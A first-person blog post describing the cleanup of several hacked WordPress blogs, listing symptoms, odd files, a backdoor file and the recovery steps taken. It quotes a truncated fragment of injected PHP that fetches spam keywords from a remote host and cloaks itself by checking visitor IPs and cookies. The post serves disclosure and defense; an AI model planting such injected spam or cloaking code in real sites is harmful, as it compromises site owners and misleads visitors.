Well as you can see, the Web Proxy Blog is back online despite the best efforts of a particularly mean set of hacks that we want to share with you to help you fix your problems and secondly to help prevent people making the same mistakes using WordPress that we did.
Firstly, this was a multiple hack across many different domains and blogs, though they all had a few things in common;
They were all run/updated from a computer that was infected with with worms, backdoors, trojans and goodness know what else. Keep your antivirus software up to date!
Secondly, they were all WordPress blogs that should have been updated. The oldest was version 2.0 and the latest was WP 2.63. We would have thought that the WordPress 2.6.3 and 2.5 installations would have been safe, but this hack is fairly new.
Finally, all the blogs were on Dreamhost. Could be a coincidence - we would be interested in hearing your comments.
The hacks manifested in a number of ways, but they all looked fine in a browser but had dozens hidden links at the bottom of each blog post. It’s only when I looked through the source code, or switched off the CSS that the links could be seen. Most of the links were real estate or lindsay lohan screensavers or something!
Another thing that was noticeable was that there were strange new files and folders in the blogs eg;
/blog/wp-includes/js/tinymce/themes/advanced/images/xp
In these directories I found files with strange filenames eg. 05417e755b378ea9a91fdbe7f71712ce. These files contained links that were appearing in the footer.
Another thing I noticed was that the wp-blog-header.php file was much larger than the original and had strange coding in it;
/* r_start */
$rurl=”http://sattan.org/feed/search.php?q=”;
$rkeys=array(”buy tramadol”,”tramadol”,”tramadol online”,”soma”,”auto insurance”,”car insurance”,”backing up files”,”car insurance quote”,”auto insurance quotes”,”auto insurance company”,”auto insurance quote”,”fioricet”,”insurance quotes”,…………………….. religion”);
$ips=unserialize(base64_decode(”YTo3OntpOjA7czoxMjoiODEuMTc3LjI2LjIwIjtpOjE7czoxMzoiNjYuMjQ5LjEzLjE1NiI7aToyO3M6MTM6IjY2LjI0OS4xNC4xNDQiO2k6MztzOjEzOiI2Ni4yNDkuMTQuMTQzIjtpOjY7czoxNDoiMjA5LjU5LjIwMS4yMzYiO2k6NztzOjEzOiI2Ni4yNDkuMTAuMTQyIjtpOjExO3M6MTE6IjcyLjI5Ljc0LjExIjt9″));
$_ip=false; if(is_array($ips)) foreach($ips as $ip) if($ip==$_SERVER['REMOTE_ADDR']){ $_ip=true; break; }
if(sizeof($_COOKIE)==0 && $_ip==false && ……………………..………..
exit;
There was also some strange coding in the template footer.php file with a 1,000 character long, Base64 string that collected spam links from www.spamreport.ru.
I also found a backdoor file, remv.php, in the root of the WordPress themes directory.
Anyway, I didn’t fancy cleaning up that mess so I decided to make a backup via ftp, delete the old files and so a completely fresh WordPress install. The only problem was that the hack seemed to have changed the folder permissions from 755 to 555, which meant that we couldn’t delete our own files!
That was easy enough to fix; setting the attributes back to their proper value, but we did notice a few files and folders that had been modified to 777 (ie read/write/execute permission) confirming our suspicion that this was a mean hack and that the best way to fix it would be to delete everything and start with a fresh installation.
The good news is that once we had done this the blogs were back to normal, with the exception of the pre WordPress 2.2 blogs that had their character set altered so that pound signs, foreign letters etc were garbled with “Ä ±” or similar. Removing these two lines from the wp-config.php fixed this;
define(’DB_CHARSET’, ‘utf8′);
define(’DB_COLLATE’, ”);
You don’t need these two lines if you are upgrading from pre WP 2.2 versions because the character sets are already built into the blog.
As a final precaution I reset the MySQL database table password and the WP admin password for good measure. We also reset the ftp password because I suspect this was a hack across so many levels that just about every one of my usernames and passwords has been compromised.
So, that’s how I spent most of my Sunday! Anyone have similar experiences, shortcuts etc. they want to share?